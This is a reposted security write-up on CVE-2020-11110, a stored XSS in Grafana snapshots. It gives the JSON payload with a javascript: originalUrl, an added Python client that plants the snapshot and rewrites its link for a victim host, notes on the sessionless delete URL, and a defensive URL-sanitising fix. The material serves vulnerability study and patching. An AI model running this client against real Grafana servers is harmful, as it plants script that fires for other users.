Grafana stored XSS vulnerability (CVE-2020-11110)

Reposted from starnight_cyber, with additions.

Preface

Grafana is a cross-platform, open-source data-visualization web application. Once a data source is configured, Grafana renders charts and alerts in the browser. CVE-2020-11110 is a stored XSS: the originalUrl field of a dashboard snapshot is not sanitised, so a javascript: URL placed there is executed when a user who opens the snapshot clicks the link icon that points back to the original dashboard.

CVE ID: CVE-2020-11110
Affected version (as tested here): Grafana v6.2.5
Link: https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html

Reproduction notes

Test environment setup

Payload (JSON body of POST /api/snapshots; the originalUrl value is the injection point):

{
  "dashboard": {
    "annotations": {
      "list": [
        {"name": "Annotations & Alerts", "enable": true, "iconColor": "rgba(0, 211, 255, 1)", "type": "dashboard", "builtIn": 1, "hide": true}
      ]
    },
    "editable": true,
    "gnetId": null,
    "graphTooltip": 0,
    "id": null,
    "links": [],
    "panels": [],
    "schemaVersion": 18,
    "snapshot": {"originalUrl": "javascript:alert('Revers3c')", "timestamp": "2020-03-30T01:24:44.529Z"},
    "style": "dark",
    "tags": [],
    "templating": {"list": []},
    "time": {"from": null, "to": "2020-03-30T01:24:53.549Z", "raw": {"from": "6h", "to": "now"}},
    "timepicker": {
      "refresh_intervals": ["5s", "10s", "30s", "1m", "5m", "15m", "30m", "1h", "2h", "1d"],
      "time_options": ["5m", "15m", "1h", "6h", "12h", "24h", "2d", "7d", "30d"]
    },
    "timezone": "",
    "title": "Dashboard",
    "uid": null,
    "version": 0
  },
  "name": "Dashboard",
  "expires": 0
}


Stored-XSS

Take the snapshot url returned by the API, replace localhost with the host the target actually reaches, open the snapshot page and click the link 🔗 icon. The javascript: URL stored in originalUrl fires: stored XSS.


Deleting the snapshot

Visit the deleteUrl that the API returned alongside the snapshot url:

http://103.210.xx.xx:3000/api/snapshots-delete/o3ITlrkiwgJexFmCJxr4gsNZ8QDcc0eQ

The snapshot is deleted. The author rates this as a more serious issue than the XSS itself. Note, however, that the deleteUrl is handed back to whoever created the snapshot, and the endpoint accepts the deleteKey in the path without a session; anyone holding that key can remove the snapshot, so the key must be treated as a secret, and the deletion only becomes a separate problem when the key leaks.
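The whole flow above (build the snapshot body, submit it, rewrite the returned url for the victim, and clean up via deleteUrl) as one small client. This is an added example, not code from the original writeup or from the Grafana project. The endpoints POST /api/snapshots and GET /api/snapshots-delete/<deleteKey> and the response fields key, url, deleteKey and deleteUrl are Grafana's own; BASE_URL, TARGET_HOST, the credentials and the sample response are constructed for illustration.

```python
"""Snapshot client for reproducing CVE-2020-11110 (added example, not the post's code)."""
import base64
import json
import urllib.request
from urllib.parse import urlsplit, urlunsplit

BASE_URL = "http://localhost:3000"    # assumption: local Grafana test instance
TARGET_HOST = "103.210.xx.xx:3000"    # assumption: host the victim actually browses to


def build_snapshot_payload(original_url, title="Dashboard"):
    """Minimal snapshot body; originalUrl is the field the snapshot page
    places behind the link icon without sanitising it."""
    return {
        "dashboard": {
            "annotations": {"list": []},
            "editable": True,
            "panels": [],
            "schemaVersion": 18,
            "snapshot": {
                "originalUrl": original_url,
                "timestamp": "2020-03-30T01:24:44.529Z",
            },
            "time": {"from": "now-6h", "to": "now"},
            "title": title,
            "version": 0,
        },
        "name": title,
        "expires": 0,
    }


def parse_snapshot_response(body):
    """Keep the four fields a tester needs from the POST /api/snapshots reply."""
    data = json.loads(body)
    return {k: data[k] for k in ("key", "url", "deleteKey", "deleteUrl") if k in data}


def rewrite_host(url, new_netloc):
    """The 'replace localhost in the url' step: swap only host:port, keep the path."""
    parts = urlsplit(url)
    return urlunsplit(parts._replace(netloc=new_netloc))


def post_snapshot(base_url, payload, user, password):
    """Create the snapshot as an authenticated user (basic auth, constructed creds)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(
        base_url + "/api/snapshots",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json", "Authorization": "Basic " + token},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return parse_snapshot_response(resp.read())


def delete_snapshot(delete_url):
    """Cleanup: deleteUrl carries the deleteKey in its path and needs no session."""
    with urllib.request.urlopen(delete_url) as resp:
        return resp.status


if __name__ == "__main__":
    payload = build_snapshot_payload("javascript:alert('Revers3c')")
    info = post_snapshot(BASE_URL, payload, "admin", "admin")
    print("snapshot url for the victim:", rewrite_host(info["url"], TARGET_HOST))
    print("cleanup url:", info["deleteUrl"])
```

Run it against a test instance only; the main block performs the real POST, while the helper functions are pure so the response handling can be checked offline against a saved reply.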

Fix

Upgrade Grafana to a release in which the snapshot originalUrl field is sanitised before it is rendered as a link; until the upgrade, restrict who may create snapshots, since the payload is stored server-side and fires for every user who clicks the icon.
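What the fix has to do, shown as an added example (not Grafana's code): the vulnerable rendering drops originalUrl straight into href, and attribute-escaping alone does not help because javascript: is a valid attribute value. The hardened version allowlists the scheme after normalising the tricks browsers tolerate (leading control characters, embedded tab/newline, mixed case) and optionally pins the host. Function names, ALLOWED_SCHEMES and the placeholder about:blank are assumptions of this example.

```python
"""originalUrl validation for snapshot links (added example, not Grafana's implementation)."""
import html
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Browsers strip ASCII tab/newline anywhere in a URL and leading C0 controls/space
# before parsing, so "java\tscript:" and " JavaScript:" still reach the js: scheme.
_STRIP_INSIDE = re.compile(r"[\t\n\r]")
_LEADING_CTRL = re.compile(r"^[\x00-\x20]+")


def normalize_url(raw):
    """Apply the same normalisation a browser would before we look at the scheme."""
    return _STRIP_INSIDE.sub("", _LEADING_CTRL.sub("", raw))


def is_safe_original_url(raw, allowed_hosts=None):
    """True only for absolute http(s) URLs (optionally on an allowlisted host).
    javascript:, data:, vbscript:, scheme-less and protocol-relative values are rejected."""
    if not isinstance(raw, str) or len(raw) > 2048:
        return False
    parts = urlsplit(normalize_url(raw))   # urlsplit lowercases the scheme
    if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
        return False
    if allowed_hosts is not None and parts.netloc.lower() not in allowed_hosts:
        return False
    return True


def sanitize_original_url(raw, allowed_hosts=None):
    """Reject rather than repair: unsafe values become an inert placeholder."""
    return raw if is_safe_original_url(raw, allowed_hosts) else "about:blank"


def render_link_vulnerable(original_url):
    """Modelled on the behaviour the writeup shows: the stored value lands in href as-is."""
    return f'<a href="{original_url}">Open original dashboard</a>'


def render_link_hardened(original_url, allowed_hosts=None):
    """Scheme allowlist first, then attribute escaping for the value that survives."""
    safe = html.escape(sanitize_original_url(original_url, allowed_hosts), quote=True)
    return f'<a href="{safe}">Open original dashboard</a>'
```

The check belongs on the write path (when the snapshot is stored) as well as on the render path; validating only at render time leaves the payload in the database for any other consumer of the snapshot JSON.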

References

https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html

That's all!